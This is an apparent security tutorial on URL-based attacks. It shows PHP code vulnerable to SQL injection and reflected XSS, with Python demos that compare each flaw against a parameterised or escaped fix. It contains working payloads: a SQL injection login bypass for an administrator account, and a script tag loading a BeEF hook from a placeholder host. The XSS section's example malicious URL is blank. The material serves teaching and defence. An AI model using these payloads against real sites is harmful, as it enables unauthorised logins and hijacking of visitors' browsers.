
Hacks that work just by changing the URL

Each section shows the vulnerable code, one legitimate request and one malicious request. Some of the malicious URLs contain characters (quotes, spaces, angle brackets) that must be URL-encoded before they are sent; your browser normally does this for you when you paste the URL into the address bar.

SQL Injection

code:
// Both fields are read straight from the query string. Credentials in a URL also end up in
// server logs, proxy logs and browser history, which is why the legitimate example below
// says the password should have been POSTed.
$username = $_GET['username'];
$pw = $_GET['password'];
// The values are pasted into the SQL string inside single quotes, so a single quote in the
// input ends the string literal and everything after it is parsed as SQL.
mysql_query("SELECT * FROM userTable WHERE username = '$username' AND password = '$pw'");
exploit (logs in as administrator without knowing the password):
example.com/?username=Administrator&password=legalPasswordThatShouldBePostInsteadOfGet
example.com/?username=Administrator&password=password' or 1=1--
The second URL turns the query into WHERE username = 'Administrator' AND password = 'password' or 1=1-- ', and because AND binds tighter than OR the condition is true for every row. Two caveats: MySQL only treats -- as a comment when it is followed by whitespace, so the URL needs a trailing %20 (or use # instead); and since the query now matches every user, which account you land in depends on which row the application takes first. Putting the payload in the username instead (username=Administrator'--%20) comments out the password check and matches only the Administrator row.
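To see the injection actually happen rather than just read the SQL, here is an added example (not code from the original post) that rebuilds the page's query in Python over an in-memory SQLite table. The table, its two users and their passwords are constructed for the demo, and passwords are stored in plaintext only because the PHP snippet compares them that way. login_vulnerable builds the string exactly like the mysql_query call above; login_safe is the parameterised version a fixed application would use.

```python
import sqlite3

# Constructed sample users, not from the original page (plaintext passwords
# only because the PHP snippet above compares them as plaintext).
USERS = [
    ("alice", "hunter2"),
    ("Administrator", "correct horse battery staple"),
]


def make_db():
    """In-memory stand-in for the page's userTable."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE userTable (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO userTable VALUES (?, ?)", USERS)
    conn.commit()
    return conn


def build_query(username, password):
    """The string the vulnerable PHP sends: user input glued into quoted SQL literals."""
    return (
        f"SELECT * FROM userTable WHERE username = '{username}' "
        f"AND password = '{password}'"
    )


def login_vulnerable(conn, username, password):
    """Run the glued-together query. Returns every username it matches; the
    application 'logs in' whichever row it reads first."""
    rows = conn.execute(build_query(username, password)).fetchall()
    return [row[0] for row in rows]


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the input as data, so a quote or
    a -- in it is compared against the column, never parsed as SQL."""
    rows = conn.execute(
        "SELECT * FROM userTable WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # The page's payload: matches every row because of AND/OR precedence.
    payload = "password' or 1=1--"
    print(build_query("Administrator", payload))
    print("vulnerable:", login_vulnerable(db, "Administrator", payload))
    # Payload in the username comments out the password check for one account.
    print("vulnerable:", login_vulnerable(db, "Administrator'--", "anything"))
    print("safe:      ", login_safe(db, "Administrator", payload))
```

SQLite accepts `--` right up to the end of the statement, which is why no trailing space is needed here; against MySQL the same payload needs `-- ` (with the space) or `#`. The parameterised query returns nothing for either payload because the whole string, quote and comment included, is compared against the password column.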

Cross Site Scripting (XSS)

If you are curious about XSS, see my article ‘Guide in understanding XSS – XSS payloads, attack vectors, BeEF hooking, MiTM with Shank and some history’.

code:
$nickname = $_GET['nickname'];
// The value is echoed into the page unescaped, so any HTML in it, including a <script>
// tag, is rendered and executed by the visitor's browser. htmlspecialchars($nickname)
// would turn the angle brackets into &lt; and &gt; and stop this.
echo "Your nickname is $nickname\n";
exploit (registers the visiting user as a zombie in BeEF by loading the BeEF hook script):
example.com/?nickname=Karrax
example.com/?nickname=
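The reflected output can be checked instead of eyeballed. The following is an added example, not code from the original post: it takes the query string the way $_GET does, renders it both the page's way and the escaped way, and parses the result to see whether a <script> element came out. The hook URL http://beef.example/hook.js is an assumed placeholder for wherever a BeEF server's hook script would be served from, not a real address.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit

# Assumed placeholder for a BeEF hook script URL; not a real server.
HOOK_PAYLOAD = '<script src="http://beef.example/hook.js"></script>'
# What the browser actually sends after URL-encoding the payload.
MALICIOUS_URL = "http://example.com/?nickname=" + quote(HOOK_PAYLOAD, safe="")
LEGIT_URL = "http://example.com/?nickname=Karrax"


def nickname_from_url(url):
    """Mimic $_GET['nickname']: the server percent-decodes the query string."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("nickname", [""])[0]


def render_vulnerable(nickname):
    """The page's echo: raw input dropped into the HTML response."""
    return f"Your nickname is {nickname}\n"


def render_safe(nickname):
    """Same output with HTML metacharacters escaped, like htmlspecialchars()."""
    return f"Your nickname is {html.escape(nickname, quote=True)}\n"


class ScriptFinder(HTMLParser):
    """Collects the src of every <script> element in a document."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_srcs.append(dict(attrs).get("src"))


def scripts_in(page):
    """Return the src attributes of the <script> elements the browser would execute."""
    finder = ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.script_srcs


if __name__ == "__main__":
    for url in (LEGIT_URL, MALICIOUS_URL):
        nick = nickname_from_url(url)
        print(url)
        print("  vulnerable page loads scripts:", scripts_in(render_vulnerable(nick)))
        print("  escaped page loads scripts:   ", scripts_in(render_safe(nick)))
```

The escaped version still shows the attacker's text on the page, but as text: the parser finds no script element because the angle brackets arrive as &lt; and &gt;. Escaping is context-specific, though; this handles HTML body and attribute context, and a value echoed inside an existing script block or URL needs a different encoder.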